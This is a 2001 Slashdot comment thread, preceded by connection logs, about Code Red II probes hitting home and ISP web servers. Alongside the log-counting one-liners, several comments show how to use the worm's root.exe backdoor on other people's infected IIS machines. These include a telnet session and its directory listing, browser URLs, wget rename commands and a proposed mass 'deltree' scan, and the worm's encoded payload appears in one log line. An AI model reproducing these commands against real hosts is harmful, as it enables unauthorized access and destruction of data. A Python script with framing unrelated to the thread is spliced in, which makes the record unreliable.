23:42:37.424684 82 h00a0cc3b6d03.ne.mediaone.net:4347
23:49:06.169691 66 h005004e76369.ne.mediaone.net:2708
23:54:37.467552 66 66.31.23.222:2406
23:54:38.024616 66 66.31.23.222:2406
23:54:38.526598 66 66.31.23.222:2406
00:03:26.283151 82 66.31.53.226:2367
00:03:26.783434 82 66.31.53.226:2367
00:03:27.308776 82 66.31.53.226:2367
00:30:06.486684 66 66.31.103.8:2572
00:30:07.011765 66 66.31.103.8:2572
00:30:07.526475 66 66.31.103.8:2572
00:30:39.764217 66 h0050dabb01ca.ne.mediaone.net:4145
00:30:40.228938 66 h0050dabb01ca.ne.mediaone.net:4145
00:30:40.741150 66 h0050dabb01ca.ne.mediaone.net:4145
00:35:24.020443 66 66.31.154.13:3635
00:35:24.544329 66 66.31.154.13:3635
00:35:25.070547 66 66.31.154.13:3635
00:36:10.709933 66 66.24.101.118:2258
00:36:11.234919 66 66.24.101.118:2258
00:36:11.745215 66 66.24.101.118:2258
00:37:22.135560 66 h000102677395.ne.mediaone.net:1693
00:37:22.710775 66 h000102677395.ne.mediaone.net:1693
00:37:23.159650 66 h000102677395.ne.mediaone.net:1693
00:40:02.028227 66 h005004e76369.ne.mediaone.net:1586
00:46:21.303078 66 66.31.176.78:2229
00:46:21.807640 66 66.31.176.78:2229
00:46:22.274141 66 66.31.176.78:2229
01:21:16.483721 82 h00a0cc3b6d03.ne.mediaone.net:3494
01:21:16.973122 82 h00a0cc3b6d03.ne.mediaone.net:3494
01:21:17.474816 82 h00a0cc3b6d03.ne.mediaone.net:3494
01:45:55.123115 66 h0050dabb01ca.ne.mediaone.net:4010
01:45:55.584579 66 h0050dabb01ca.ne.mediaone.net:4010
01:45:56.084967 66 h0050dabb01ca.ne.mediaone.net:4010
01:46:05.080026 66 h005004e76369.ne.mediaone.net:2495
01:46:19.448977 66 h00c04ff51cd7.ne.mediaone.net:1781
01:46:19.921529 66 h00c04ff51cd7.ne.mediaone.net:1781
01:46:20.442538 66 h00c04ff51cd7.ne.mediaone.net:1781
01:46:55.337709 66 h00105a22d072.ne.mediaone.net:4983
01:46:55.839717 66 h00105a22d072.ne.mediaone.net:4983
01:46:56.392686 66 h00105a22d072.ne.mediaone.net:4983
01:47:09.796381 66 h00105a22d072.ne.mediaone.net:1428
01:47:10.276086 66 h00105a22d072.ne.mediaone.net:1428
01:47:10.811053 66 h00105a22d072.ne.mediaone.net:1428
01:47:18.500196 66 h00105a22d072.ne.mediaone.net:1691
01:47:19.028113 66 h00105a22d072.ne.mediaone.net:1691
01:47:19.579917 66 h00105a22d072.ne.mediaone.net:1691
01:47:27.595175 66 h00105a22d072.ne.mediaone.net:1963
01:47:28.104053 66 h00105a22d072.ne.mediaone.net:1963
01:47:28.646113 66 h00105a22d072.ne.mediaone.net:1963
01:49:04.483718 66 h00c04ff51cd7.ne.mediaone.net:1970
01:49:04.964339 66 h00c04ff51cd7.ne.mediaone.net:1970
01:49:05.486200 66 h00c04ff51cd7.ne.mediaone.net:1970
01:50:48.239598 66 h000102677395.ne.mediaone.net:2151
01:50:48.795367 66 h000102677395.ne.mediaone.net:2151
01:50:49.320730 66 h000102677395.ne.mediaone.net:2151
01:50:50.803870 66 208.196.23.183:4684
01:50:51.609295 66 208.196.23.183:4684
01:50:52.418740 66 208.196.23.183:4684
01:51:10.695161 66 h0020780443d3.ne.mediaone.net:1686
01:51:11.141443 66 h0020780443d3.ne.mediaone.net:1686
01:51:11.649209 66 h0020780443d3.ne.mediaone.net:1686
01:57:28.927295 66 h00a0cc65dafd.ne.mediaone.net:2387
01:57:29.419477 66 h00a0cc65dafd.ne.mediaone.net:2387
01:57:29.915338 66 h00a0cc65dafd.ne.mediaone.net:2387
01:59:45.318955 82 h0010a4b2ec27.ne.mediaone.net:1738
01:59:46.046086 82 h0010a4b2ec27.ne.mediaone.net:1738
01:59:46.540815 82 h0010a4b2ec27.ne.mediaone.net:1738
02:00:34.621898 82 h0000b4aab5d3.ne.mediaone.net:4203
02:00:35.140900 82 h0000b4aab5d3.ne.mediaone.net:4203
02:00:35.647869 82 h0000b4aab5d3.ne.mediaone.net:4203
02:01:19.026076 66 66.31.34.197:3530
02:01:19.537435 66 66.31.34.197:3530
02:01:20.037510 66 66.31.34.197:3530
02:02:54.574322 66 h0050dabb01ca.ne.mediaone.net:4667
02:02:55.078305 66 h0050dabb01ca.ne.mediaone.net:4667
02:08:45.746726 82 h00d0b7aae700.ne.mediaone.net:3915
02:08:46.207120 82 h00d0b7aae700.ne.mediaone.net:3915
02:08:46.712318 82 h00d0b7aae700.ne.mediaone.net:3915
02:10:50.960570 66 h0050dabb01ca.ne.mediaone.net:2134
02:10:51.495640 66 h0050dabb01ca.ne.mediaone.net:2134
02:10:52.005772 66 h0050dabb01ca.ne.mediaone.net:2134
02:12:27.539188 66 h0000b49dc596.ne.mediaone.net:4114
02:12:28.059970 66 h0000b49dc596.ne.mediaone.net:4114
02:12:28.570862 66 h0000b49dc596.ne.mediaone.net:4114
02:13:38.080598 66 h0050dabb01ca.ne.mediaone.net:2717
02:13:38.516787 66 h0050dabb01ca.ne.mediaone.net:2717
02:13:39.015100 66 h0050dabb01ca.ne.mediaone.net:2717
02:17:01.162745 66 h005004e76369.ne.mediaone.net:1637
02:19:48.014875 66 h005004e76369.ne.mediaone.net:1514
02:20:16.174304 82 h0010a4b2ec27.ne.mediaone.net:2503
02:20:16.742444 82 h0010a4b2ec27.ne.mediaone.net:2503
02:20:17.180213 82 h0010a4b2ec27.ne.mediaone.net:2503
02:20:26.455462 66 h0050dabb01ca.ne.mediaone.net:2050
02:20:26.946521 66 h0050dabb01ca.ne.mediaone.net:2050
02:20:27.416633 66 h0050dabb01ca.ne.mediaone.net:2050
02:22:50.732375 66 h005004e76369.ne.mediaone.net:1867
I agree that you have a point, but I don't think it's just the size of the installed base. Most Redhat users probably have a greater understanding of the need to keep their system patched...and Linux doesn't hide all the details of the system from the user in the way that Windows does. It's quite possible that many home Win2k users don't even know that they are running IIS at all, much less that they need to keep informed about exploits and patches for such.
Linux tends to encourage its users to learn more about the workings of their system, in my opinion. Windows tends to encourage people to think of their computer as an "appliance" that they don't have to worry about.
when will you people realize that code red is not just another worm that will fade away soon.. code red makes not only IIS webservers vulnerable.. but any service with an available exploit. i'm talking about the "code red algorithm" that it uses to scan the ip's and spread so fast. this is what makes code red so special.. and this is why we'll be having more of this soooner than you guys think.. its DDOS days all over again..
Will be 3 lines then:
wget "http://$REMOTE_ADDR/scripts/root.exe?/c+ren+shell.exe+infected.dat"
wget "http://$REMOTE_ADDR/scripts/root.exe?/c+ren+root.exe+infected.dat"
wget "http://$REMOTE_ADDR/scripts/root.exe?/c+ren+c:\explorer.exe+infected.dat"
If anybody hasn't noticed, there is usually shell.exe also in scripts dir.
__
L.
-S
--- What parts of "shall make no law", "shall not be infringed", and "shall not be violated" don't you understand?
I just thought of something.... what would happen if everyone running Apache (or another SECURE httpd) put a default.ida file in their server. Of course, it wouldn't be just any old file... it would be a web page with embedded scripts which would take advantage of OTHER known exploits in M$' IIS/PWS. The scripts could do anything we wanted; INCLUDING cleaning the host of the worm by patching and rebooting the system. Now THAT would be a hell of a hack, if indeed it could be done.
What does the /. community think? Is something like this feasible, or am I just talking out of my ass?
Does anyone even care about this site anymore? Ever since I've stopped regularly visiting Slashdot, I swear my blood pressure has dropped. All the fucking Linux zealots just got to me. Wake up, people.
you're the millionth guy to suggest it, and it's still a stupid idea
Unbelievable. Now script kiddies don't even need to do their own hacking, just run a webserver and pick hacked machines from the log.
The question is how large the MS community will grow before it kills itself off with something like this, not whether it will happen....
Most ACs are not even worth the keystrokes to insult them. Be generically insulted and ignored otherwise.
Run a scan against the entire address space with a modified version of the above.. only use "deltree" instead of dir. Should fix the problem.
grep "default.ida?" access_log | cut -d' ' -f7 | sort | uniq -c
Aren't you the Wipo Troll?
> telnet x.x.x.x 80
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
GET /scripts/root.exe?/c+dir HTTP/1.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 05 Aug 2001 09:35:11 GMT
Content-Type: application/octet-stream
Volume in drive D has no label.
Volume Serial Number is A8A2-CE97
Directory of d:\inetpub\scripts
2001-06-03 04:12a <DIR> .
2001-06-03 04:12a <DIR> ..
2001-06-13 09:07a 289 default.asp
2001-06-13 09:07a 289 default.htm
2001-06-13 09:07a 289 index.asp
2001-06-13 09:07a 289 index.htm
2000-01-10 09:00p 310,544 root.exe
5 File(s) 311,700 bytes
2 Dir(s) 353,468,416 bytes free
Connection closed by foreign host.
I safety test pot everyday and its still not sold at Walmart. MS endangers data everyday and its doing just fine. Go figure...
That is probably the smartest thing I've ever heard anyone say on slashdot. Ever. Someone show their skills and write a variant that will run the patch (obviously not locally if they don't have it) from a remote server. Yeah you can hate MS all you want but until someone does something about it we're all going to be sucking bad HTTP requests.
This worm is combining TWO worms; both the Code Red worm we know and love, and the less-recent SANDMIND worm (sp?), famous for running DOS commands and posting an anti-US webpage at 'default.asp', 'default.html', 'index.asp', and 'index.html' on directories relative to the website root. Apparently this worm is using 'cmd.exe' to get root access; what it does beyond that, I have no idea... I haven't been hit by it. I guess the logic is .... if the box isn't patched against Code Red, chances are it isn't patched against SANDMIND, too.
Also, 90% of the 'NNNN's in my server logs came from my Class A subnet (and much more frequently than the 'XXXXX' requests).
Logs available upon request, etc.
I was scanned 340 times yesterday, and as of 7:30 am today I have seen 130 scans. This is WAY more than earlier in the week. I was only getting 20-30/Day. The mainstream press seems to think this thing has gone away, but they are wrong. I have noticed a significantly slower net the last few days on my cable modem.
grep default.ida access_log | awk '{print $1}' | sort | uniq | wc -l
155 unique IP's.
grep default.ida access_log | awk '{print $1}' | wc -l
232 Total Hits
grep default.ida access_log | grep home.com | awk '{print $1}' | sort | uniq | wc -l
32 Unique @home hits.
grep default.ida access_log | grep home.com | awk '{print $1}' | wc -l
96 Total @home hits.
Yeah, most attacks are definitely coming from the block I'm on. ::sigh::
Read: Rabbit Rue - Free serial nove
You've been trolled.
127 = his own machine. and he said IIS.
i have an old 486 running freesco as my broadband splitting device. klogd must be going crazy. since i got back home this morning it has rejected TONS of attempts on port 80. i suspected it was code red of course, but what bugged me was that it was mostly coming from my neighbors in 24.167, a few more in 24.something else, and an occasional one from a different class A. i thought code red was random. and then this story pops up. makes sense. well its been fun all day going to http://insert.victim.ip.here/. :) there must be others doing the same since i get this once in a while:
HTTP 403.9 - Access Forbidden: Too many users are connected
Are you pondering what I'm pondering?
So let me get this straight... Every machine on the planet practically has a list of infected IP addresses broadcasted to them, with a new one arriving every minute or so (up to 663 XXX's here in the past two hours).
So that means any loser with this list of infected IPs and some knowledge of perl literally has a small army of computers at their command?
I think we might be seeing some rather impressive DDoS attacks by this evening.
Hmm.. 3 more XXX's in the time it took me to write this... frequency's increasing...
Oh yeah, since you can't enter command to the prompt you need to pass the commands to execute as arguments to root.exe (which is really cmd.exe). You can do this by typing "GET /scripts/root.exe?/C%20dir" or something like that. Or you could enter http://somehost/scripts/root.exe?/C%20dir into your favourite browser.
I've found that typing absolute paths doesn't work for some reason, but http://somehost/scripts/root.exe?/C%20dir%20"..\.. \Documents%20and%20Settings\All%20Users\Desktop\" (remove the spaces) should bring you to the desktop.
I wanted to leave a message to the admin on the desktop but I have no idea how to do that since "echo" is part of cmd.exe and piping probably won't work too. Perhaps someone with WinNT skills could offer some ideas?
Monkey sense
or...
- Operating systems don't have wheels.
I've noticed that a lot of the infected servers are 403'ing me ("Too Many Connected Users") so I'm guessing that once our Chinese (or, for you conspiracy theorists, Microsoft employee) buddies get their stuff setup on their 0wned boxes they turn IIS to allow one connection only or something to block everyone else besides them out.
The obvious conclusion is that they're setting up for a DoS or something. Sucks to be the target they should choose.. 100,000 UDP packet sources anyone? Eerk.
--
Strangely enough, most of the servers I get the XXXX/NNNN requests from, do not accept connections on port 80. Go figure.
Shutting down free speech with violence isn't fighting fascism. It IS fascism!
If you are installing Win2k server on a box, you get IIS by default - and its enabled. You have to actually go and disable it. This is probably the biggest problem, in that every copy of Win2k server installed on any box is also a webserver. What do you want to design badly today?
"The first time I got drunk, I got married. The second time I bought a chimpanzee, after that I stayed sober" Arian Seid
Checking my web logs, I only see 1 Code Red IIs. Thankfully, running IIS, all my servers do is say "huh?" and log it.
"The price of freedom is eternal vigilance." - Thomas Jefferson
- reverse DNS is not done everywhere. It would be so easy to track things down if forward and reverse DNS were in sync
- email aliases like abuse, webmaster and hostmaster are not common on windows-machines.
- email aliases like abuse, webmaster and hostmaster are not common under domains.
- whois-servers of ccTLD are often hard to find or inoperative (hint to ICANN: we *NEED* whois!)
I really hate these webservers which give me an unreadable (prolly some asian font) page, without any clue on who to inform.
Of the more than 100 unique messages I sent out this weekend, more than 80% completely bounced because there was no abuse/webmaster/hostmaster alias.
Anyway, I don't foresee any job-problems for people who try to educate internet-newbies with common rules like reverse dns and aliases for common mail-names...
bash$
Damn. I use ADSL and i was sensible. The 176 people i counted attacking my Apache server are OBVIOUSLY fools with Win2k.
I have now made a neat perl script called default.ida to log attacks to my mysql db. When does the hurting stop?
Weevil
ghaa.
Let's count the number of remote expoits for apache and IIS and decide which system is more secure
A pity that this won't actually give you any kind of realistic indication as to how insecure they actually are.
To do that you'd also need to know how many attempts to find exploits on each were made. It's more likely that Apache just hasn't been hammered on as much.
Simon
Coming soon - pyrogyra
Yeah, and your attitude is the reason why we occasionally have to scrape the jocks' brains (or what little of it that they had) from the library floor...
RWXS is not what I call a permission system, and if it is, it's a very coarse-grained system, certainly not usable on an everyday file server. And yes I'm serious. Imagine templates for a word processor. A group needs to read and write them. A group needs to read them. All other users must not have access. Can't do it with rwxs, and most Unix shops don't (they use Windows and Netware for file servers).
Windows users get to choose between an actual VMS / Trusted Nix style permission system or nothing at all. That's choice.
Most services can be chrooted, but they're not. The FHS doesn't even care about chrooted services - they should be standard. Most services don't need root privileges (yay capabilities), but they use them.
I prefer Linux over Windows for my own work, but for others, the best tool for the job is Windows.
Just checked my logs... Great, I'm on fucking dialup and there's a stupid worm bouncing invalid requests off port 80 of a Linux box I have set up to do NAT. Normally I wouldn't condone drastic measures, but I think ISPs (broadband or otherwise) should start logging the IPs their boxes are getting hit with and if the IP matches that of a customer - BOOM! there goes their access! Finally, invoke TOS for a useful purpose! If the user(s) in question want restored access, they must either update their affected Microsoft product, change to a better OS or STOP RUNNING ANY TYPE OF WEBSERVER if the ISP's terms of service forbid running a webserver.
These ID10Ts need to patch their 'doze boxen or get the hell off the Internet.
---
DRM is like antifreeze, to the MPAA/RIAA it's sweet, to the consumers it's poison.
The way I see it, we are all reaping the foul harvest MS has sown. I can't even imagine the amount of bandwidth being wasted on these stupid worms. I don't use MS server products, but because of this their crappiness is STILL affecting me...and us all.
Short of someone writing an illegal patch-worm, this could be seriously difficult to stop. There are just too many IIS installations that are run by people who either don't know what they are doing or worse don't even know what IIS or a web server is. That's the problem with these "idiot-proof" GUI webservers...they can be run by idiots.
We need to see MS get some serious bad press for this, or it won't end. It's getting out of control (judging by the fact that my home Apache server is being hit with this new strain every 5 seconds...literally), and I think it's time MS killed the monster they created and got a little more proactive about finding and notifying the people who are running these unpatched installs...
I have logged 27 attempts in the last 5 minutes from Sprint Broadband customers. This could really get annoying. The main problem I see is that even though I am not vulnerable to the attack, my ability to monitor for other attacks is being diminished. A determined hacker could easily attempt to slip in with all the noise.
Apparently @home is monitoring its customers for Code Red.
I'd JUST reinstalled Win2k Pro on a new system, I'd added IIS for my own purposes and before I had a chance to run the service pack and patch, I got the Code Red worm (ok, so I was lazy and tired and was going to leave it for the morning)
@home unbound my cablemodem until I'd cleared the worm (disable IIS, reboot).
normally, I'd be a little annoyed at @home for monitoring my connection and cutting my connection rather than just block all traffic to that IP at router level. but hey, it saved me from contributing to a problem.
If you're hearing rhetoric about Linux, open source, or Mac and everyone's bashing Microsoft, you've found Slashdot.
Mod parent UP! That made my DAY!
one better than mcleodeight
This is what I used.. Nothing much, but I find it somewhat useful :)
LOGFILE=/home/httpd-1.3.20/logs/access_log
# Source IPs of Code Red v1 hits (NNN padding) and Code Red II hits (XXX padding), one per line.
# sort must come before uniq: uniq only drops adjacent duplicates.
grep 'default.ida?NNN' $LOGFILE | cut -d ' ' -f 1 | sort | uniq > old.cr
grep 'default.ida?XXX' $LOGFILE | cut -d ' ' -f 1 | sort | uniq > new.cr
# Total hits, then the number of distinct attacking hosts
grep -c default.ida $LOGFILE > total.cr
grep default.ida $LOGFILE | cut -d ' ' -f 1 | sort | uniq | wc -l >> total.cr
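The one-liners above (and the grep/awk/uniq counts posted earlier in the thread) answer "how many hits, how many hosts". The script below is an added example, not anything posted in this thread: it parses Apache common-log lines, tells the two variants apart by their padding character (N for the original Code Red, X for Code Red II), and reports how many distinct sources fall inside the server's own /8 and /16, which is the "Class A / Class B" pattern the story describes. The sample log lines are constructed and their request strings are shortened; the server address 24.5.200.1 is an assumption.

```python
import ipaddress
import re
from collections import Counter

# Constructed sample in Apache common log format (not taken from anyone's logs in the thread).
# Request strings are shortened: real probes carry a long run of X or N followed by the
# %u-encoded payload, but the classifier only needs the prefix.
SAMPLE_LOG = """\
24.5.192.239 - - [05/Aug/2001:01:45:12 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 278
24.5.201.17 - - [05/Aug/2001:01:46:02 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNN HTTP/1.0" 404 278
24.5.201.17 - - [05/Aug/2001:01:46:30 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNN HTTP/1.0" 404 278
24.130.8.9 - - [05/Aug/2001:01:47:10 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 278
61.12.3.4 - - [05/Aug/2001:01:48:44 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 278
192.0.2.50 - - [05/Aug/2001:01:49:00 -0400] "GET /index.html HTTP/1.0" 200 1043
this line is deliberately malformed and must be skipped
"""

# Common log format: client ident user [timestamp] "METHOD path protocol" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\S+)')

# Code Red v1 padded its request with N, Code Red II with X
CODE_RED_RE = re.compile(r"^/default\.ida\?(X+|N+)")


def classify_request(path):
    """Return 'CodeRedI', 'CodeRedII' or None for one request path."""
    m = CODE_RED_RE.match(path)
    if m is None:
        return None
    return "CodeRedII" if m.group(1).startswith("X") else "CodeRedI"


def analyze(log_text, server_ip):
    """Count Code Red probes and measure how many distinct sources share the server's /8 and /16."""
    server = ipaddress.ip_address(server_ip)
    same_8 = ipaddress.ip_network(f"{server}/8", strict=False)
    same_16 = ipaddress.ip_network(f"{server}/16", strict=False)
    hits = Counter()
    sources = set()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a log line we understand
        client, path = m.group(1), m.group(4)
        variant = classify_request(path)
        if variant is None:
            continue  # ordinary traffic
        hits[variant] += 1
        try:
            sources.add(ipaddress.ip_address(client))
        except ValueError:
            continue  # logs with resolved hostnames land here; counted but not bucketed
    return {
        "total_hits": sum(hits.values()),
        "hits_by_variant": dict(hits),
        "unique_sources": len(sources),
        "same_slash8": sum(1 for s in sources if s in same_8),
        "same_slash16": sum(1 for s in sources if s in same_16),
    }


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_LOG, "24.5.200.1").items():
        print(f"{key}: {value}")
```

Point it at a real access_log with `analyze(open(path).read(), your_ip)`; a high same_slash8 / same_slash16 share relative to unique_sources is what the posters in this thread are seeing by eye.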
When you execute 'dir', 'type', etc. the output gets printed to stdout and returned to you via HTTP but if you run notepad.exe the Win32 API is addressed and a window might pop up on the server. I expect this behaviour because AFAIK Windows doesn't allow remote GUI logins (not sure about telnet/ssh logins).
Monkey sense
and wc -l
grep -c default.ida access*
we've been slow for the last week! no other explanation than codeRed of course
I'm out of my mind right now, but feel free to leave a message.....
Never gonna happen.. its illegal to write and/or release worms in many states/countries, no matter for what purpose.. If Microsoft releases it, they will never admit it.. Plus, it would take bandwidth to scan for more hosts to "save" and if there were bugs in the code (its Microsoft, there MUST be bugs in the code!) the results could be unpredictable..
More, Microsoft wants to conquer the world and become a new government, not destroy the world and rule a bunch of roaches! =)
Holiday weekend here in Canada...one more day of this. Oh boy.
Carousel is a lie!
10.0.0.0 seems fine too...
Err... looks like I forgot to close the tag. D'oh!
political_news.c: warning: comparison is always true due to limited range of data type
"Code red algorithm"??? It's called a random ip scan. In this variation, it's called a scan of the local subnet with a random ip thrown in every now and then. There's nothing special about it.
It's fast because that's how exponential growth works.
Slow service? I don't know about other @home customers (I'd like to hear) but my net connection was completely _down_ for about 8 hours this afternoon. As a matter of fact I just got back on.
The interesting thing was that the "cable" light on my cable modem was still on when usually when I can't get on the net it is off.
So I wonder what the problem really was. If maybe the routers were all up but the dhcp servers were down or something....
Anyone else have similar problems?
I don't use DHCP (it didn't seem to work well for multiple IPs), so I don't think that's it. Service has been touch and go for the past 30 hours or so, although it's relatively stable this evening. When service was down, I would ping my subnet's default gateway, and not receive a response. I subscribe to 2 IPs, on different subnets, and they've both been affected at various different times.
Personally, I feel that if this continues, @Home needs to credit me back part of my subscription fee.
If you read the Micro$oft EULA it is basically unwarranted for anything. Furthermore, M$ limits their liability to the cost of the software or $5 US, whichever is more.
Personally, I think the time for talking is over. It's time for what we used to call "muscle" during labor strikes. M$ deserves a little muscle right now.
I am logging about 50 attempts per hour and nearly all of them are coming from IPs within my ISP (61.x.x.x). This is a 5MB wireless network and it seems to be very busy tonight.
You really think that your average windows luser moron will actually put two and two together? Come now get real. They will probably just hit the home button so they can go to MSN and catch up with the latest Britney Spears news.
War is necrophilia.
195 total, 78 within my Class B... All telocity users in my class b.
"Nature doesn't care how smart you are. You can still be wrong." - Richard Feynman
It even works from a browser. Just use http://IP/scripts/root.exe?/c%20dir%20/s%20\* where "IP" is the address of the server.
Is there a way to just disable IIS? I think that'd be the best solution.
I got a multi-homed box in a colo that's getting hit with multiple attacks/second. No performance biggy, but I'd like to start neutralizing this. My log files are getting big. Guess I'll make a PHP script to keep track of this stuff.
For what exactly do you have an IT dept anyway? If the marketing dept makes all the decisions regarding computer software (and hardware also, it may be hard to run IIS on a non-x86) and a web design company does your server setup, what can the IT dept do? Take the blame? There's a big difference between web designer and web developer/administrator. And a designer should not say anything about platform. Period.
_________________________
Spelling and grammar mistakes left as an exercise for the reader.
First, DoS are illegal..
Second, imagine that it runs some important software, other than the webserver, that can not stop and someones life/job depends on it.. imagine that its an hospital or something else.. Would you like to have the blood of innocent on your hands, just because you dont like Microsoft?..
Why DoS and go to jail (if its a corporation) when you can email and er.. live happily ever after in freedom?
This variant installs a backdoor. Whenever you're attacked, your host should automatically respond by telnetting into the back door, installing the MS IIS patch, and send the sysadmin a $250 'consulting fee' for fixing their server. (This is slightly different than the oft-suggested "why not making a patching worm?")
Back on a serious note: How long will it be before someone starts suing the owners for letting their computer be a platform for an attack? Not long, I fear. I guess we'll see a huge upsurge in linux and apache installations when that day comes, though.
I have been hit over 35 times in 12 hours, way more than the first code red
Modest doubt is called the beacon of the wise - William Shakespeare
for the past 30 minutes I've gotten about 150 requests, 95% of them on the 24.* range, like this one..
24.5.192.239 - - [05/Aug/2001:01:45:12 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 278
... this is going to be a very interesting night
I also get N's from time to time
[alk]
Several @home customers have written about slowed service today, but they're definitely not alone.
I've had slowed service today, but I think that's because I've been using Mozilla (which is now up to 69,428K in memory usage).
ok then your [sic] infringing on my copyright! Could you as [sic] me next time before STEALING my comments for your own?
Do you think the RIAA cares what happens to their web server? They'd love it if the entire Internet went down in flames, which we're told is what will happen if code red or some variant that actually worked would clog every pipe entirely. Their puny web server would be a small price to squeeze out all the bandwidth being used by mp3s.
Yes, and where you have an unpatched IIS install, you often get a wide-open FTP server running as well. It's been making for some interesting browsing.
This is different. They were exclusively being threatened but the UDA for spam.
The real culprit with this is that people are running unsecured, unpatched IIS.
I think locking down local port 80 would cause more problems than good.
Even for windows users, a 120.00 linksys box and some know how will protect you. At least close the blatent problems and protect your internal network.
You see, the problem with that is my mother-in-law. She runs Windows98, has a cable modem and loves to play on the internet. I was visiting recently and wanted to use her computer to check my email. When I turned her computer on, I was physically ill watching the system tray fill up with 80 icons for ridiculous garbage nobody would ever need. 4 free trials to online services. 3 virus scanners (1 inactive). Various monitor "applications" for the video system, sound system, etc etc etc. Broken shortcuts all over the desktop. Had never run windows update. Never defragged the hard disk. That "some know how" you're talking about just doesn't exist in the world of my mother-in-law, and there are many, many more just like her who think "securing my computer" means making sure nobody breaks in and steals it. Don't hold your breath waiting for my mother-in-law to suddenly wake up, install linux and a firewall and become a 31337 h4x0r.
We don't have a state-run media we have a media-run state.
you must not read enough. this idea has been tossed around all the time. the thing is it's an illegal thing to do ... it fights fire with fire but it's still illegal. why would anyone want to get arrested for fixing the net anyway?
back to parsing my log file :)
Why don't they cover this now, when it might actually do some good?
Man, I'm glad that I'm not using Minesweeper. This new virus exploits an unexploded mine in Minesweeper, and it does use Outlook and the stupidity of users. Luckily, I'm running OpenMine, so I'm not at risk. In fact, OpenMine has protected me from 2^37-302 virii. And just look at the millions of dollars that I've saved using OpenMine. I hope that this OpenMine takes off, along with OS/2. Unfortunately, my doghouse has to pay for the stupidity of Microsoft: this virus sucked 212 nibbles of bandwidth!
"Evil company X is threatening to restrict our rights! Let's all get together to stop--OOOH! SHINEY!!!" -- AC
This is LAME. Believe me, there is more to life than annoying people just because you can. A lot more.
grep ida /foo/bar/log | awk '{print $1}' | sort | uniq |\
awk '{print "<a href=\"http://" $1 "\">" $1 "</a><br>"}'
Carousel is a lie!
I'm having the same thing happen here in Indy, on the Speedway segment. Connection seems to occasionally drop (seems like overnight), though online light still stays on. I reset modem and it can take over an hour to fully come back online. Tech support has no clue.
So, now that the news is out about the rootkit, two things are happening. First, there are a few crackers out there somewhere that are installing even more cunning rootkits or trojans on the systems that are infected and at the same time covering their tracks. Second, there are a lot of hackers out there helping cover the crackers tracks with curiosity and well meant stuff.
For grins, can't the network adapters be shut down from a command prompt?
Does the income I've derived from working with Unix belong to SCO?
Power to the Peaceful
just wait till the trolls get a hold of that one... images of "the receiver" and "the giver" opening up on untold millions of pc's worldwide... this will be friggin hilarious!
Aug 5 00:04:13 nano kernel: Packet log: input DENY ppp0 PROTO=6 204.172.72.112:4474 208.162.198.38:80 L=48 S=0x00 I=56830 F=0x4000 T=119 SYN (#19)
65.4.97.166 This guy is an Alcoholic IT professional.
65.4.29.5 This one has a 'secure' login. And it wants to know your 1040 return date.
65.4.1.33 This one says fuck us government. Contact:sysadmcn@yahoo.com.cn
Slashdot is a waste of time, I hope to continue in that tradition.
http://www.qwest.com/dsl/customerservice/win675ups.html
I think that 2.4.1 was one of the patches that resolved this security issue:
http://www.cisco.com/warp/public/707/CBOS-multiple.shtml
and remember: if you want to get anything out of this, call it a Windos Worm when you talk to non-free friends.
yes, I know Unix worms do exist. but last time I checked, all of the recent large-scale infections were windos-based, plus a Unix worm would by far not propagate that easily and quickly. bonus point: it wouldn't be in visual basic.
Assorted stuff I do sometimes: Lemuria.org
Yes, quite easy actual, the line to get a directory listing would be: GET /scripts/root.exe?/c+dir HTTP/1.0
Just wanted to add my own shell script for producing a list...
grep default.ida /var/log/apache/access.log | awk '{print $1}' | sort
Well, with everyone feeling the need to chime in about what ranges they see like we did when we were taking bets if school would be canceled, I just felt like saying:
Nothing from the 192.168.0.x range here!!
=)
Wheeeee
I have seen some interesting solutions to this and since I can't quickly bring up a web server to try it, let me suggest trying a buffer exploit on CodeRed. Instead of sending a 404 to the GET default.ida request, send back a string of trash that is longer than any default.ida file could be. Maybe it'll choke...
Does the income I've derived from working with Unix belong to SCO?
And all on the night that I decided to net-install FreeBSD.
It's a good thing otherwise I'd have to forward him a note documenting his case and how to resolve the issue.
Or maybe just walk over and hand him a copy of Apache.
Ben
Work Safe Porn
Checking through my snort logs I only see this new variation making attempts on a very small set of the IP addresses in my netblock. After poking around a little I found that ALL of these machines were running services on port 80. Has anyone else seen this? Is this new version checking to see if the service exists before it sends the http request?
Dozings.com -- Its kinda funny... If you're as crazy as me.
That other guy is funny. You are not.
Modify the code red code to apply the security patch to the vulnerable IIS servers and reboot the system? While this is potentially destructive to your system (I'm told -- MS security patches and all that) it would pretty well take care of this problem...
Nah, this will just make the sysadmins even lazier.
SysAdmin #1: Dude, your NT machines are all infected with Code Red!
SysAdmin #2: I know! I'm just waiting for for them to be infected with the fix... should be any day now...
"And like that
I'm getting hammered from the 61.*.*.* range, too... and I'm just on a laptop with a dialup. Aren't I glad I run Apache and not IIS to do local web dev... - John
i did the same thing too.. 315 hits from 24.*.*.* in my logs
Not in Quebec.
Of course, I'd never run IIS on my workstation, let alone a server, but it's fun to watch the HTTP requests come in on ZA.
